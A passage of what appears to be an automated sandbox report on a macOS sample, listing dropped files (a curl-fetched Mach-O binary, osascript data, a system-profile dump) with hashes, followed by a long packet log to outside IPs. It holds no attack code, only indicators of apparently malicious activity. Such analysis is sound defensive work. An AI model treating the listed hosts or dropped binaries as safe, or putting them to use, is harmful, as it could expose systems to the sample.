                                                                      SSDEEP:24:MBjohBas4ET1S2GMi1f1k2t26GwBenwRrzeMdQxLI9dIZoTC1cWB6:wSB8ETE5M2k2t2QBenwt6MgLI9dmW8k
                                                                      MD5:0DE6D6FB609F0B0ED4A39BB3FEF8B9E8
                                                                      SHA1:5CEF29DC95DCC010D7797DE7780DEF625BC031C2
                                                                      SHA-256:A80CC94745540269B939142BDF0683AB004CAD98281E1921A9F6AC603386F6A5
                                                                      SHA-512:1D0F777A2AF019FE8D48F2F1BC3821F2AD9CF51747E4470CB801FCBAB3E479423565C83CEEB86A43928C2F56F506EE13913D16F237F47686EFB0DEC25827D4F2
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:Software:.. System Software Overview:.. System Version: macOS 10.14.2 (18C54). Kernel Version: Darwin 18.2.0. Boot Volume: Macintosh HD. Boot Mode: Normal. Computer Name: mojave. User Name: System Administrator (root). Secure Virtual Memory: Enabled. System Integrity Protection: Disabled. Time since boot: 2 minutes..Hardware:.. Hardware Overview:.. Model Name: Mac mini. Model Identifier: Macmini8,1. Processor Speed: 3.01 GHz. Number of Processors: 1. Total Number of Cores: 2. L2 Cache (per Core): 256 KB. L3 Cache: 18 MB. Memory: 4 GB. Boot ROM Version: VirtualBox. Apple ROM Info: vboxVer_7.0.12vboxRev_159484. SMC Version (system): 2.3f35. Serial Number (system): 0. Hardware UUID: 6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2..Graphics/Displays:.. Display:.. Type: GPU. VRAM (Total): 3 MB. VRAM (Dynamic, Max): . Device ID: 0xbeef. Revision ID: 0x0000.
                                                                      Process:/usr/bin/curl
                                                                      File Type:Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|WEAK_DEFINES|BINDS_TO_WEAK|PIE>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|BINDS_TO_WEAK|PIE>]
                                                                      Category:dropped
                                                                      Size (bytes):234656
                                                                      Entropy (8bit):3.081958215032428
                                                                      Encrypted:false
                                                                      SSDEEP:1536:0JbsXk/YEDMSm/LW7z0y32sUV5296lzQfdEp76lxu5h3c0lddl3OzQOgZAW0oZuE:Gg7SVQHfd
                                                                      MD5:0418181CAABA4686FAE772B60D9A2C62
                                                                      SHA1:80B98D4816114177FC9361B107E87AFA33D71F64
                                                                      SHA-256:F48CF1B5AD2435FEA9FDB7F7D2774BACCA8C506E4AB9BAA4B95174A40ADE0515
                                                                      SHA-512:D094A9FA0A805F3E3BDB543E42906C11A6F0E60A563782B7AFDF0B26076D53BE3AC1DEA535847AC479F183BE83F6E246743780417A556F01F220E7398D476F8E
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:..................@...Up...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:/usr/bin/osascript
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1248
                                                                      Entropy (8bit):7.8505293694080605
                                                                      Encrypted:false
                                                                      SSDEEP:24:iesJE6ku40tgwyOxo9TRQK2Ju2oeLXbi1mDgfMkisqDUwmmzVwYHk:PODz4Eo98J6OXbXDEqTfjE
                                                                      MD5:0090043DD2DAE918F77147763D238E6B
                                                                      SHA1:980074431A801043A8A0708C93C8190516E7FEA5
                                                                      SHA-256:3A8A7A0DE75BDEF4F575F5E1A4802BDB460301E5040CDF377D6E29DE304D542A
                                                                      SHA-512:0D1724143514B043B89735E9635CB8988A6DB37FFFBC9684F65F0F71551CE7B0813DFE49C36779435E38A15D249ED50902118A028F6CBAE0CF8F877D835175E8
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:NSCR1000...........{.u.2..H.u...)...b.....XvM%. ...o/.j..8V_*.oZ;:F.).......0s5,.8.dD;m./.w.=(Q.h}%q.3g..1qU..*......_:'Oi<..(_...f...VL].Y............p...PC.Q7.|F}h`..qJ.<..7.*...?..?R=.<..Pn..T...w...(D\..~)..|..gi.Eo....9#.j5E.....e.Z....m..x...|W....k.T.NQ-..v....~.<Z!..xISh'x.i..NA../.m.M..h..^.[.S'._..S...%)........s.N&....i.V.../.._....LI>.....B.....N....^.{...1.I....*.&.7....vZ....{)....'.n...*@..Htu..}..J..J.5....z.....9.~...[...J....."X;D.&6...T4.e.-2.9.h!..,.Pt.E{.e.._....8.Y....$...V..F..._..Y.2.D.Va..@..E.2.m.w=1...e...b.........|:.p....n......g.......B..}..dC%.>.0p.....8.P9.....A...w.0w....X.3.=/....$)i....Z..>.l..rJ..;..N%.b.`...!........8.W...O8...u.q....X..>.8m.&f...u..K.....eU\1h.....L:i!D<..e...8...R...1.u.X."...{/L.F<..aT.C.....D.h3IB...@...+..l^...L.#<.P..@l..A..2....{..5^e.f......V...wJ. R......d&.^.%.....".u.sA.:..Q*.rX..(\....Y.yq.U3hM......o.hU...'.RnU..G.FW.P.....0...t.p.=....NSCR1000....... ..).vP.A..1%K....G.y.AYS
                                                                      Process:/usr/bin/osascript
                                                                      File Type:Apple binary property list
                                                                      Category:dropped
                                                                      Size (bytes):828
                                                                      Entropy (8bit):6.1614055634278815
                                                                      Encrypted:false
                                                                      SSDEEP:12:Qq10XGnLxGArG7u4Q3Vfged3bjaaFApp/DB+AkKEkXTfuC4G3O1cPHWXh:/+SLkP7uTgWCoADDFkTgTm1G3OcH2h
                                                                      MD5:B6B9147CD7843341520DF3842CDAE086
                                                                      SHA1:E14B025F3866CA6C3DC226F75EDCE6EAB30CB936
                                                                      SHA-256:5278E0EBB68CE65E23FB9D950707BC9F103A5F89EE9CF131BAEB45BFF382EB60
                                                                      SHA-512:F83868E8BA36DD26597F699DCF78E983EDC6BDF58988885CFF11AD8F246FF23051B202634470410B07FD28B41567A558FE2522EE25296DF08CC2557857461225
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:bplist00........................\NSDragRegionZNSWindowIDYNSDataKey_..NSUIPersistenceIsKey^NSWindowNumber]NSWindowLevel]NSWindowFrame_..NSIsAuxiliaryFullScreenWNSTitle_..NSWindowWorkspaceIDO.$......................................O..9..a.......%M*...<.._..302 439 420 175 0 0 1024 745 ._..System PreferencesP............#$%^NSWindowZOrderZNSIsGlobal_..NSSystemVersion_..NSSystemAppearance_..NSExecutableInode..O..aNL............ !"......O...bplist00.........X$versionX$objectsY$archiverT$top..........U$null.....V$class_..NSAppearanceName...._..NSAppearanceNameDarkAqua.....Z$classnameX$classes\NSAppearance...XNSObject_..NSKeyedArchiver...Troot.....#-27<BGNace............................................................. .-.8.B.Y.h.v.........................3.4.C.R.].o.....................................&................

                                                                      Static File Info

                                                                      No static file info

                                                                      Network Behavior

                                                                      Download Network PCAP: filteredfull

                                                                      Network Port Distribution

                                                                      • Total Packets: 274
                                                                      • 443 (HTTPS)
                                                                      • 80 (HTTP)
                                                                      • 53 (DNS)
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 19, 2025 20:31:46.743108034 CET44349349151.101.3.6192.168.11.12
                                                                      Jan 19, 2025 20:31:46.745204926 CET44349349151.101.3.6192.168.11.12
                                                                      Jan 19, 2025 20:31:46.745325089 CET44349349151.101.3.6192.168.11.12
                                                                      Jan 19, 2025 20:31:46.745444059 CET44349349151.101.3.6192.168.11.12
                                                                      Jan 19, 2025 20:31:46.745567083 CET44349349151.101.3.6192.168.11.12
                                                                      Jan 19, 2025 20:31:46.745598078 CET44349349151.101.3.6192.168.11.12
                                                                      Jan 19, 2025 20:31:46.745826960 CET49349443192.168.11.12151.101.3.6
                                                                      Jan 19, 2025 20:31:46.746073961 CET49349443192.168.11.12151.101.3.6
                                                                      Jan 19, 2025 20:31:46.746164083 CET49349443192.168.11.12151.101.3.6
                                                                      Jan 19, 2025 20:31:46.746164083 CET49349443192.168.11.12151.101.3.6
                                                                      Jan 19, 2025 20:31:46.754494905 CET49349443192.168.11.12151.101.3.6
                                                                      Jan 19, 2025 20:31:46.825908899 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:46.936079979 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:46.937098026 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:46.940270901 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.050602913 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.050987959 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.051050901 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.051085949 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.051878929 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.051878929 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.051969051 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.123857021 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.234397888 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.234437943 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.236011028 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.236011028 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.263755083 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.265021086 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.265091896 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.265213013 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.266432047 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.374924898 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.374934912 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.375171900 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.375910997 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.376029015 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.376147985 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.376224995 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.376662016 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.377104044 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.377181053 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.377181053 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.377507925 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.383763075 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.383882999 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.385267019 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.385540009 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.391485929 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.391606092 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.392925024 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.393263102 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.399297953 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.399416924 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.400726080 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.401050091 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.407049894 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.407150984 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.407769918 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.407857895 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.414866924 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.414969921 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.415505886 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.416012049 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.486597061 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.486697912 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.487411022 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.487631083 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.490521908 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.490622997 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.491204977 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.491295099 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.498325109 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.498425007 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.498982906 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.499213934 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:47.506140947 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.506150007 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:47.506793976 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:48.003336906 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:48.113342047 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:49.202847004 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:49.206129074 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:49.312990904 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:49.313683987 CET49350443192.168.11.1217.248.228.69
                                                                      Jan 19, 2025 20:31:49.316145897 CET4434935017.248.228.69192.168.11.12
                                                                      Jan 19, 2025 20:31:50.803257942 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:50.803298950 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:50.804169893 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:50.822926998 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:50.822957993 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:51.322071075 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:51.324100018 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:51.324166059 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:51.440474987 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:51.440509081 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:51.440788984 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:51.441629887 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:51.442058086 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:51.482445002 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:51.999470949 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:51.999558926 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:51.999650002 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.003372908 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.003467083 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.003510952 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.003804922 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.003891945 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.003936052 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.004215956 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.004296064 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.004338026 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.004636049 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.006057978 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.006120920 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.006264925 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.006360054 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.006478071 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.006609917 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.006948948 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.007690907 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.008239985 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.009274006 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.009655952 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.232913971 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.232937098 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.233007908 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.236924887 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.236984968 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.237206936 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.237623930 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.237683058 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.237871885 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.237940073 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.238307953 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.238364935 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.238516092 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.238693953 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.238749981 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.238787889 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.238897085 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.238925934 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.239022970 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.239034891 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.239481926 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.239634037 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.239936113 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.239936113 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240008116 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240272045 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240417957 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240473032 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240612030 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240700960 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240833044 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.241168976 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.241658926 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.241887093 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.242264986 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.467607975 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.467616081 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.467773914 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.470829964 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.470848083 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.471035957 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471127987 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471142054 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.471385002 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471661091 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471751928 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471960068 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471972942 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.472167969 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472179890 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.472269058 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472281933 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.472464085 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472477913 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.472570896 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472675085 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472826004 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472834110 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.473026991 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473026991 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473037004 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.473123074 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473371983 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473463058 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473469019 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.473592997 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473696947 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473881006 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473968983 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473972082 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.474102020 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474268913 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474349022 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474492073 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474553108 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.474714041 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474803925 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474803925 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474812031 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.474850893 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474900007 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474900007 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474900007 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475011110 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475011110 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475059986 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475059986 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475158930 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475162029 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.475977898 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476181984 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476274014 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476403952 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476403952 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476650000 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476742029 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476831913 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476974964 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.477355003 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.477771044 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.478251934 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.478630066 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.487258911 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.487612963 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.487972021 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.488301992 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.512120008 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.512140989 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.515966892 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.516222954 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.516485929 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.516577005 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.516720057 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.516731977 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.516927958 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.517226934 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.517518997 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.517597914 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.518104076 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.701209068 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.701292038 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.702428102 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.702496052 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.702708960 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.703732014 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.703793049 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.703808069 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.703820944 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.703964949 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704005957 CET49356443192.168.11.1281.19.135.228
